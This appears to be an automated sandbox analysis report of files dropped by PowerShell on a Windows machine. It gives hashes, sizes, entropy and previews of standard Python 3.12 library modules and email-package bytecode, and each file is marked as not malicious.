                              Preview:"""Simple textbox editing widget with Emacs-like keybindings."""....import curses..import curses.ascii....def rectangle(win, uly, ulx, lry, lrx):.. """Draw a rectangle with corners at the provided upper-left.. and lower-right coordinates... """.. win.vline(uly+1, ulx, curses.ACS_VLINE, lry - uly - 1).. win.hline(uly, ulx+1, curses.ACS_HLINE, lrx - ulx - 1).. win.hline(lry, ulx+1, curses.ACS_HLINE, lrx - ulx - 1).. win.vline(uly+1, lrx, curses.ACS_VLINE, lry - uly - 1).. win.addch(uly, ulx, curses.ACS_ULCORNER).. win.addch(uly, lrx, curses.ACS_URCORNER).. win.addch(lry, lrx, curses.ACS_LRCORNER).. win.addch(lry, ulx, curses.ACS_LLCORNER)....class Textbox:.. """Editing widget using the interior of a window object... Supports the following Emacs-like key bindings:.... Ctrl-A Go to left edge of window... Ctrl-B Cursor left, wrapping to previous line if appropriate... Ctrl-D Delete character under cursor... Ctrl-E Go to
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):63334
                              Entropy (8bit):4.554279086644667
                              Encrypted:false
                              SSDEEP:1536:nVS1yQgJzsfzC7p30ZOyMObfdldG0DNhWJu8kUC0TGNymq4jsgzBAoPv:nVSbgUP55BA6v
                              MD5:50C0AF51B067736C07A22259274203F7
                              SHA1:0F9EAC094DC3027D562B02CAD4020AA2FDA0D447
                              SHA-256:ECE6C46C2B051F8C4FA7A02E084BB51A22325AE9A86CE7FC583C334B6D8D2EC3
                              SHA-512:505D172BA3524488F9427BB5E4D08CAF5E92405796EF5CF3D9B9AD587CAEACE224D9221A2ABF113A82BCF2F6D230B9C4F948F2A710AB43285C005E392A7AAADD
                              Malicious:false
                              Preview:import re..import sys..import copy..import types..import inspect..import keyword..import functools..import itertools..import abc..import _thread..from types import FunctionType, GenericAlias......__all__ = ['dataclass',.. 'field',.. 'Field',.. 'FrozenInstanceError',.. 'InitVar',.. 'KW_ONLY',.. 'MISSING',.... # Helper functions... 'fields',.. 'asdict',.. 'astuple',.. 'make_dataclass',.. 'replace',.. 'is_dataclass',.. ]....# Conditions for adding methods. The boxes indicate what action the..# dataclass decorator takes. For all of these tables, when I talk..# about init=, repr=, eq=, order=, unsafe_hash=, or frozen=, I'm..# referring to the arguments to the @dataclass decorator. When..# checking if a dunder method already exists, I mean check for an..# entry in the class's __dict__. I never check to see if an attribute..# is defined in a base clas
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):277
                              Entropy (8bit):4.4269070385805716
                              Encrypted:false
                              SSDEEP:6:g9Mn8T9Mn8pdOYdRpLXGvn8Tvn8pdOjD6RERbJ9RMT9RMtLhDLAowg+rIakbQPy:YDpdldRRFIpdQD6iJz2eLhQjgsIasQPy
                              MD5:2F62882E2CB74D2D97D848E3F39CA0EB
                              SHA1:E3AE01A237B6AA3577F10B2BAEE88F9668CBAB16
                              SHA-256:5068C4ED2C79BFB4B9AE426675112CA8C89CA27AA40B33DABE6CD313AB22DD73
                              SHA-512:CDC083EF42E189E4287DD07B17638B8DBF02E1C5A53E2D529EFEF96BEFD45AF4956384A841571460EB1419CEAB0287BCE1C99C52423B1AB3B87A7373278644EF
                              Malicious:false
                              Preview:try:.. from _datetime import *.. from _datetime import __doc__..except ImportError:.. from _pydatetime import *.. from _pydatetime import __doc__....__all__ = ("date", "datetime", "time", "timedelta", "timezone", "tzinfo",.. "MINYEAR", "MAXYEAR", "UTC")..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6072
                              Entropy (8bit):4.437386125288259
                              Encrypted:false
                              SSDEEP:96:Y0Z6om2P6kXGyFQBEIA7FZKOYS8QYG6mV4JFZlUPhNtbPFXzl0lWtEU:jN1ikXGgQ+77FZVJlVClAr95zZtT
                              MD5:B20818F8CCEEA3CC9488C79EF0DD809C
                              SHA1:22AD51A255BE7EE05CBC48AC32AF6B90B54393DA
                              SHA-256:166B25F6A81A2D970D057BAD1EA64BAF9B83B65028C3A6D09F0F184C754BDE48
                              SHA-512:E7976B3B41684156C9B1D60974DFB79D26F26FCE120A8527E1620CC4D917045CAAE0FA7FCDCF347AA8B0DC69AB8F697083DAF22356B4450D7658E0D112BE2FB6
                              Malicious:false
                              Preview:"""Generic interface to all dbm clones.....Use.... import dbm.. d = dbm.open(file, 'w', 0o666)....The returned object is a dbm.gnu, dbm.ndbm or dbm.dumb object, dependent on the..type of database being opened (determined by the whichdb function) in the case..of an existing dbm. If the dbm does not exist and the create or new flag ('c'..or 'n') was specified, the dbm type will be determined by the availability of..the modules (tested in the above order).....It has the following interface (key and data are strings):.... d[key] = data # store data at key (may override data at.. # existing key).. data = d[key] # retrieve data at key (raise KeyError if no.. # such key).. del d[key] # delete data stored at key (raises KeyError.. # if no such key).. flag = key in d # true if the key exists.. list = d.keys() # return a list of all existing keys (slow!)....Future versio
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11911
                              Entropy (8bit):4.457013162753753
                              Encrypted:false
                              SSDEEP:192:LyENNkKganL8/o/LMwRU0hY9uD+g80U/RT18/e3n33M3qNcR4:LYarMyhce4
                              MD5:75F093FC1BAA8147653332D0A1EF3B28
                              SHA1:5C27C22E59A7F1AAC0E25C47DD8AD01E3A7110B7
                              SHA-256:3E624BE74A2FB347C2B1FFE877CCC77182618E0BDF94C4CB7A343ED8CCD7584B
                              SHA-512:468FD350848DD49B362592FEBFEE663A7F26D8A09B0B3129A0A117937756366B8EF5E14A85A619D931A89749E01406AD1C7B2D327890FC06313DE026D737AEF4
                              Malicious:false
                              Preview:"""A dumb and slow but simple dbm clone.....For database spam, spam.dir contains the index (a text file),..spam.bak *may* contain a backup of the index (also a text file),..while spam.dat contains the data (a binary file).....XXX TO DO:....- seems to contain a bug when updating.......- reclaim free space (currently, space once occupied by deleted or expanded..items is never reused)....- support concurrent access (currently, if two processes take turns making..updates, they can mess up the index)....- support efficient access to large databases (currently, the whole index..is read when the database is opened, and some updates rewrite the whole index)....- support opening for read-only (flag = 'm')...."""....import ast as _ast..import io as _io..import os as _os..import collections.abc....__all__ = ["error", "open"]...._BLOCKSIZE = 512....error = OSError....class _Database(collections.abc.MutableMapping):.... # The on-disk directory and data files can remain in mutually.. # inconsi
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):75
                              Entropy (8bit):4.301891945228928
                              Encrypted:false
                              SSDEEP:3:OAArkHIF3BcTxIxPjZ6CH4JgBiv:OlIQBdx9mgBM
                              MD5:49B75CF4D832E5DB5BFE4537C5332188
                              SHA1:2EB4AA2CC6539F68E5A42590919F97CF02B47F24
                              SHA-256:98DCF3E73DC56C7DBF013852F685EAC1FE3A911785E682AB69836EBA5656C142
                              SHA-512:AD5DF52AD3AEF6D44F23D934CD3DE15E7D1BA4900FDE2E70C21009B074C718A47ECFEFA2B14B2FE9462B7DC0BBA8C5371236CA926704A0FD21DEC0FF4D1B450B
                              Malicious:false
                              Preview:"""Provide the _gdbm module as a dbm submodule."""....from _gdbm import *..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):73
                              Entropy (8bit):4.237502560318079
                              Encrypted:false
                              SSDEEP:3:OAArb0cTxIxPjZ6xxBiv:OlUdx98xBM
                              MD5:5967B257F3143A915F76FA1F4494E989
                              SHA1:BD1C90535C5926383AE4B6D02936AB96A147AE92
                              SHA-256:D747238751AA697D7040EE1479E0C3EFF0172E1195825061CF517CF9BEF30050
                              SHA-512:B6DB12A07B47BB2D034354B81CF4EDEC4E7F1305DE222FC7E68F14AB290F12F9F576D7BB4EFF138186E1B6DED2168882A79447EA1BCFDD3ED5C19869503EEBD9
                              Malicious:false
                              Preview:"""Provide the _dbm module as a dbm submodule."""....from _dbm import *..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):331
                              Entropy (8bit):4.098213504925523
                              Encrypted:false
                              SSDEEP:6:DoJ2xToJ2xpdOWoJ2x7EdMoJ2xhVfwRpLXGFJ2xTFJ2xpdOWFJ2x7EdMFJ2xhVfv:E4xU4xpdg4xgdN4xhVfYRW4xR4xpdt4E
                              MD5:19468B7C81C8C73F6B37DE1BE745672C
                              SHA1:1877E11D665B90BCEBED2341A6806DCBC62FB499
                              SHA-256:F205D8DC95D81B5D2B59362CBE0E385CFEEB98C14A70971F3372BE1403378B03
                              SHA-512:3D129FA184C46A8B8D77D235946875DA7543EE964E1FEEC5986C3816EA9A4D023F3A71A3EBDA9D6539CF7F561C8E0D8F9749B9CB3310B84B16391642A5E7CD2A
                              Malicious:false
                              Preview:..try:.. from _decimal import *.. from _decimal import __doc__.. from _decimal import __version__.. from _decimal import __libmpdec_version__..except ImportError:.. from _pydecimal import *.. from _pydecimal import __doc__.. from _pydecimal import __version__.. from _pydecimal import __libmpdec_version__..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):85364
                              Entropy (8bit):4.512246773776763
                              Encrypted:false
                              SSDEEP:1536:PxMUIKEi9FINTaSyEJH7/7Jh1rHww2FJQppY5VbhCAMqRCKM8g6S8/2wUcZ:vIBqqY5VbhCAM+CKM8FS8/VZ
                              MD5:FF9CBAADC1B0F414B2627CE5F761AB8E
                              SHA1:8ED742A47D1C009E2789328C2AD2DF72D3788B7F
                              SHA-256:F517AE2F8750BD8A1C7A2F5BB14310CA2D961B7402AF7A8AB256EF75C91769B6
                              SHA-512:191349E29C43C528D9246607189E6F8D740134121A46EF96E94C0A51C441EEC8D47C05DFDC53E33294EF35B35BD7153A3DDA7B5DBF1A41F9FA4F6309D3D5CCD6
                              Malicious:false
                              Preview:"""..Module difflib -- helpers for computing deltas between objects.....Function get_close_matches(word, possibilities, n=3, cutoff=0.6):.. Use SequenceMatcher to return list of the best "good enough" matches.....Function context_diff(a, b):.. For two lists of strings, return a delta in context diff format.....Function ndiff(a, b):.. Return a delta: the difference between `a` and `b` (lists of strings).....Function restore(delta, which):.. Return one of the two sequences that generated an ndiff delta.....Function unified_diff(a, b):.. For two lists of strings, return a delta in unified diff format.....Class SequenceMatcher:.. A flexible class for comparing pairs of sequences of any type.....Class Differ:.. For producing human-readable deltas from sequences of lines of text.....Class HtmlDiff:.. For producing HTML side by side comparison with change highlights..."""....__all__ = ['get_close_matches', 'ndiff', 'restore', 'SequenceMatcher',.. 'Differ','IS
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):31014
                              Entropy (8bit):4.549595297390582
                              Encrypted:false
                              SSDEEP:768:0GQ9YbheVe4TBHD24wi7iIaDtEhUffbERzwC:RQ9YFeUN4wi7i3pEhU7FC
                              MD5:17703E44412C3EC9691F26B9FFBFF025
                              SHA1:2F949E4285465D990335A7BF195F79A516FBD359
                              SHA-256:77F36465F7043CC1A03CC9400D7AA9CBC20FBFD352B67F797722234AFAFB78FC
                              SHA-512:79C445A1C1FB576B0938F6EBC0014820370F5F7D9A43ABA2D1CCEE5A5AC0896394E3D58DB510FB86F032ABC986037765A0564DCB1AA4EB7EE5F7371FCB752B2C
                              Malicious:false
                              Preview:"""Disassembler of Python byte code into mnemonics."""....import sys..import types..import collections..import io....from opcode import *..from opcode import (.. __all__ as _opcodes_all,.. _cache_format,.. _inline_cache_entries,.. _nb_ops,.. _intrinsic_1_descs,.. _intrinsic_2_descs,.. _specializations,.. _specialized_instructions,..)....__all__ = ["code_info", "dis", "disassemble", "distb", "disco",.. "findlinestarts", "findlabels", "show_code",.. "get_instructions", "Instruction", "Bytecode"] + _opcodes_all..del _opcodes_all...._have_code = (types.MethodType, types.FunctionType, types.CodeType,.. classmethod, staticmethod, type)....FORMAT_VALUE = opmap['FORMAT_VALUE']..FORMAT_VALUE_CONVERTERS = (.. (None, ''),.. (str, 'str'),.. (repr, 'repr'),.. (ascii, 'ascii'),..)..MAKE_FUNCTION = opmap['MAKE_FUNCTION']..MAKE_FUNCTION_FLAGS = ('defaults', 'kwdefaults', 'annotations', 'closure')....LOAD_CONST = opmap['LOAD_CONST']..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):109317
                              Entropy (8bit):4.55453891907484
                              Encrypted:false
                              SSDEEP:3072:kELdN9WiDzDeFhoeYsioJT0U+0GNZ9sjQeOax9VUaHwez20T+28:bdN9WiDzDeFhFYsioJT0U+0GNZ9sjQei
                              MD5:D0941298414AE243472D1A5924367DC9
                              SHA1:8B2FDC03ADCA9B9B114CD69E1B32E9AEECA1E892
                              SHA-256:1364770532FBA6645D3343E23D5D277A1699EF4F88702B315A5892FD381CCDB7
                              SHA-512:E565CA28A60E2E109829F6D052837DC09D00047229CA958525A94A2839E782C3B907C775724C02F1FB82D31121955E1A8AC53F69351CCCD703D0EF95191F90FE
                              Malicious:false
                              Preview:# Module doctest...# Released to the public domain 16-Jan-2001, by Tim Peters (tim@python.org)...# Major enhancements and refactoring by:..# Jim Fulton..# Edward Loper....# Provided as-is; use at your own risk; no warranty; no promises; enjoy!....r"""Module doctest -- a framework for running examples in docstrings.....In simplest use, end each module M to be tested with:....def _test():.. import doctest.. doctest.testmod()....if __name__ == "__main__":.. _test()....Then running the module as a script will cause the examples in the..docstrings to get executed and verified:....python M.py....This won't display anything unless an example fails, in which case the..failing example(s) and the cause(s) of the failure(s) are printed to stdout..(why not stderr? because stderr is a lame hack <0.2 wink>), and the final..line of output is "Test failed.".....Run it with the -v switch instead:....python M.py -v....and a detailed report of all examples tried is printed to stdout, alo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1825
                              Entropy (8bit):4.655187743194238
                              Encrypted:false
                              SSDEEP:48:2XvNh6MGDF/hDSvkvxnsj/axPSLxnsbXqxP0:2Xlh6MgDxnsjuPSlnsbXGP0
                              MD5:03BD52E5F016DB3578053FF11252F401
                              SHA1:A412CB62418071C4718A0B2F9A73BDA37AE1B567
                              SHA-256:F4B71B7B51A7EEBC46BBB6470CF6DA746CBB5E9548A6BC2A57B84F451EFD9769
                              SHA-512:32E0A9484851071F59B909E544E8D1992592FA6ED9E4BA97A91FA8835345ACBD4E3580E2FACF0EAC9169899AC897AA4D6B18842C354CBC3E0D5E734BDDBEB7E3
                              Malicious:false
                              Preview:# Copyright (C) 2001-2007 Python Software Foundation..# Author: Barry Warsaw..# Contact: email-sig@python.org...."""A package for parsing, handling, and generating email messages."""....__all__ = [.. 'base64mime',.. 'charset',.. 'encoders',.. 'errors',.. 'feedparser',.. 'generator',.. 'header',.. 'iterators',.. 'message',.. 'message_from_file',.. 'message_from_binary_file',.. 'message_from_string',.. 'message_from_bytes',.. 'mime',.. 'parser',.. 'quoprimime',.. 'utils',.. ]......# Some convenience routines. Don't import Parser and Message as side-effects..# of importing email since those cascadingly import most of the rest of the..# email package...def message_from_string(s, *args, **kws):.. """Parse a string into a Message object model..... Optional _class and strict are passed to the Parser constructor... """.. from email.parser import Parser.. return Parser(*args, **kws).parsestr(s)....def message_from_bytes(s, *a
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1958
                              Entropy (8bit):5.157569944553099
                              Encrypted:false
                              SSDEEP:48:7moh6OD9UscLNoQnTfS1NX3wksNVqAPqN7qta:yoh6OFGoafSf7MVqAPW7f
                              MD5:CF1C0ADF9F91AA7CEAA166CB2E2BA37B
                              SHA1:6A69C684B0B4AB200BAC9292D1B8B41872D45934
                              SHA-256:10DB27BF1694522A68CF8A8F7730EAEBA8AB8C623C75FB6418340366EAEE8E73
                              SHA-512:5E61004050055A8F9811B8201E507429DC260E20941E5B40EDE540281A50D87715D86CF8744DFAB818F4F9A3252A0981BFDA8E86642E4B3B0030A98323BD5AA8
                              Malicious:false
                              Preview:.........U.f!.........................(.....d.Z.g.d...Z.d...Z.d...Z.d...Z.d...Z.y.).z?A package for parsing, handling, and generating email messages.)...base64mime..charset..encoders..errors..feedparser..generator..header..iterators..message..message_from_file..message_from_binary_file..message_from_string..message_from_bytes..mime..parser..quoprimime..utilsc.....................<.....d.d.l.m.}.....|.|.i.|.....j...................|.........S.).zvParse a string into a Message object model... Optional _class and strict are passed to the Parser constructor.. .........Parser)...email.parserr......parsestr)...s..args..kwsr....s.... .LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\__init__.pyr....r........s".........$....4....3.....(..(....+..+.....c.....................<.....d.d.l.m.}.....|.|.i.|.....j...................|.........S.).z|Parse a bytes string into a Message object model... Optional _class and strict are passed to the Parser constructor.. r.....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8345
                              Entropy (8bit):5.455433023856351
                              Encrypted:false
                              SSDEEP:192:HxRpL+TEgH5n14qSWZd8h7j0Og9WaXV3N6tXNariL:HxRN+4g5n2qSWEh7j0Odaut9aG
                              MD5:85459A1B92083F07F68A35474F669F1A
                              SHA1:E7C6ACDE732E9252C3B4776E5D1BA9D113D8F6AA
                              SHA-256:28A1EBB9EF0BA48B84174E561AC290CA47BF7D4EAFE70DB713B0A2E65B384A0B
                              SHA-512:CAF21B564FCEE463C6A3BB31C87AB8C8A191C4F0F172D461A0C19CD79DB43633F017FA985CF7478F3DC7E1C0F814E0C30F17810F145E0ED539707EBF070AB83B
                              Malicious:false
                              Preview:.........U.fF"........................2.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...g.d...Z...e.j.....................e.j...................d.........j...................d...........Z.d...Z...G.d...d.e.........Z...e.........Z.d.e...e.d.........<...d...Z.d...Z.d...Z.d...Z.d...Z.e.e.d...Z.d...Z.e.e.d...Z.e.e.d...Z.d.d...Z.y.).z. Routines for manipulating RFC2047 encoded words...This is currently a package-private API, but will be considered for promotion.to a public API if there is demand........N)...ascii_letters..digits)...errors)...decode_q..encode_q..decode_b..encode_b..len_q..len_b..decode..encodes....=([a-fA-F0-9]{2})c.....................f.....t.........j...................|.j...................d.........j...................................S.).N.....)...bytes..fromhex..groupr....)...ms.... .RC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\_encoded_words.py..<lambda>r....A...s ......%.-.-........... 1. 1. 3..4.......c.....................@..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):23304
                              Entropy (8bit):4.977218144505305
                              Encrypted:false
                              SSDEEP:192:Mfmff5f3fIUmqWYy9yRxl1aZqQu0xC020arasoie3lg63pqqiscdFecKXhXX8i3m:MGLm3njImE0arjZQ263pqiESt5m
                              MD5:5826B3D387D7F1DA9F46D5313939E300
                              SHA1:DD0F9E96E8B960A3470044450AA80E9747EBBFEF
                              SHA-256:C6DA3A91D391424EFD1788471DED8CE2669DCBA51B0C62D43D9ADE54EA846717
                              SHA-512:8ACADFCCAE4A36F999323FBD4F792D59397B934D22BFBDB35F77DF5D55EDE74E58EA6EA6383CB7D0F3682E6957D0727BAE8B1F8BCFF6A0BB18E1D2DC7E0C2DE2
                              Malicious:false
                              Preview:.........U.f.G.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.d.Z.g.d...Z.g.d...Z.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...G.d...d.........Z...G.d...d.e.........Z.y.).zcEmail address parsing code...Lifted directly from rfc822.py. This should eventually be rewritten..)...mktime_tz..parsedate..parsedate_tz..quote.....N.. ..z., )...jan..feb..mar..apr..may..jun..jul..aug..sep..oct..nov..dec..january..february..march..aprilr......june..july..august..september..october..november..december)...mon..tue..wed..thu..fri..sat..sunip...i....i....i....iD...i....)...UT..UTC..GMT..Z..AST..ADT..EST..EDT..CST..CDT..MST..MDT..PST..PDTc.....................H.....t.........|.........}.|.s.y.|.d.......d.|.d.<...t.........|.........S.).zQConvert a date string to a time tuple... Accounts for military timezones.. N.....r....)..._parsedate_tz..tuple)...data..ress.... .NC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\_parseaddr.pyr....r....-...s
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):18231
                              Entropy (8bit):5.1632257626752756
                              Encrypted:false
                              SSDEEP:384:fsiLRUZPQSIBjiOai/AZupPdEGApMc5jeax0M2G7XGXWGo2r:f9Lc4rxm77em2
                              MD5:594339840EB28A652E5A8610C7CE43C2
                              SHA1:6505AAA727D2E0FD541AAC0507A69C6BEE2D4A30
                              SHA-256:74DAF011A18E5908AF36197E463A312BF5B70F16D48D79532352FDAA4E5BABD9
                              SHA-512:C44348AC68D8B8BB8EA92517192507124A25A93D8A196EB5B7C94354FCFEB16C6A1F917920C1A0A12C68F7E07C49B28003F1C4A8BE04CB86637D2BA3DCD5CF54
                              Malicious:false
                              Preview:.........U.fW<.............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z...G.d...d.........Z.d...Z.d...Z...G.d...d.e.e.j.............................Z.e...G.d...d.e.................Z...e.........Z.y.).zwPolicy framework for the email package...Allows fine grained feature control of how the package parses and emits data.......N)...header)...charset)..._has_surrogates)...Policy..Compat32..compat32c.....................:.......e.Z.d.Z.d.Z...f.d...Z.d...Z.d...Z.d...Z.d...Z...x.Z.S.)..._PolicyBasea....Policy Object basic framework... This class is useless unless subclassed. A subclass should define. class attributes with defaults for any values that are to be. managed by the Policy object. The constructor will then allow. non-default values to be set for these attributes at instance. creation time. The instance will be callable, taking these same. attributes keyword arguments, and returning a new instance. identical to the called instance e
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3989
                              Entropy (8bit):5.510545247428225
                              Encrypted:false
                              SSDEEP:96:iFncbReNF+6+V0rQ9ysk3IKig2YtzX78okRSvggndf:gcle3nE05ynYtzqgYgn5
                              MD5:A200C3DB7295364E7511BB928AA4BEE2
                              SHA1:1B30D0BECAB4856C32BAAEAF393F5B4A25E1C7FD
                              SHA-256:5FCABEE357147163F9582C2D71C45552628A4374EA3538B9F0DF59E698A6C8F9
                              SHA-512:F1154BEC715F549B8BE364AECE60A337E53EE3D95A0DC2BEBB4D167A643C114550AC2E9D0B463F115C142B9F055CA4ACFAC8212536E6879DA39A8203CF8A109C
                              Malicious:false
                              Preview:.........U.fR.........................d.....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d...Z.d.d...Z.d.e.f.d...Z.d...Z.e.Z.e.Z.y.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.decoding. To d
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):15287
                              Entropy (8bit):5.437123717646531
                              Encrypted:false
                              SSDEEP:384:Gg1ZVD+ZadGfz/pkyZZ4ybmbyxkudCdG5bY:bhDk/7pszuZ5bY
                              MD5:B0C5C42843A23DCDCA8F22575C76865A
                              SHA1:63D48ABAB72A0AA6F018FB41C02000DD1E3EB8D9
                              SHA-256:E984422484FA9A5A652BC0AC365AA19370A6E4901183AA8DE44D285A92A11A9A
                              SHA-512:54D5EA8E8EACB7AFAE2606A5F985311582C763033C51ECA12268614CD30F23343807BDC59F14D5A665B9C3ADDC0777333EDA861DE1A1F5459D86DC310F220ABD
                              Malicious:false
                              Preview:.........U.f5D..............................g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8..Z.d9..Z.d:..Z.d;..Z...G.d<..d=........Z.y.)>)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252..viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1..latin_2z.latin-2..latin_3z.latin-3..latin_4z.latin-4..latin_5z.lat
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2128
                              Entropy (8bit):5.24522344192699
                              Encrypted:false
                              SSDEEP:24:hRmyMb+TT5rqIgNfx2mdGKg6FDEzXTGTa/ruyhBmu/JMpKMx2RFmg4jcqOwrK7:XmFbZPB0m46FYjTQa/ru+9Mxo/4HOwrE
                              MD5:A0BEF4C1F9EB41C44498451B54C11C78
                              SHA1:0630CE79142C820654121DFCAE1BAE0CF2C40FC5
                              SHA-256:33F3DD12CFC715E32FEA420EBBBBF33377A6E40774A0A1ACDF056183F827AB4B
                              SHA-512:CF18837FAE40C4DCA04AA70987A14BB8FE164BC72630192C034D34AF0F1737FB1C8DDE8629E7EDD955A18EEB6B2C9137405E3E5699299009E92E6C73D65237E9
                              Malicious:false
                              Preview:.........U.f3.........................F.....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d...Z.d...Z.d...Z.d...Z.d...Z.y.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc.....................@.....t.........|.d...........}.|.j...................d.d.........S.).NT)...quotetabs..... s....=20)..._encodestring..replace)...s..encs.... .LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\encoders.py.._qencoder........s............T..*.C....;.;.t.V..$..$.....c.....................~.....|.j...................d...........}.t.........t.........|.........d.........}.|.j...................|...........d.|.d.<...y.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..orig..encdatas.... r....r....r........s;...........?.?.$.?..'.D....(.4...'..*.G..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6879
                              Entropy (8bit):4.929632144684434
                              Encrypted:false
                              SSDEEP:192:aYDQgFYYKvxJ879J58Ce/0J3B4iq7Y1Am70o0IoxDQmbeXCX17S6S+b:aiTFYYKvxJ879J58CQ0J3B4iq7Y1AJoA
                              MD5:6616DDD0F972ED1E5F41E023E3EA2E51
                              SHA1:642A04AFC0B120482D9A45C28DEC7E8CCA18D715
                              SHA-256:BC3562F3540382A146475E3CD7F64E92885255E0D0DB3088D0867DCCBFEC5F17
                              SHA-512:E4FAD2C39171F78A528E1A9918AF18B24472C2FB764958A4A617C91DDDE3CDB0CE979486D9A38D457843273ABEB8244FA45E1017AE07EFC12F4F9A4F5E94C69D
                              Malicious:false
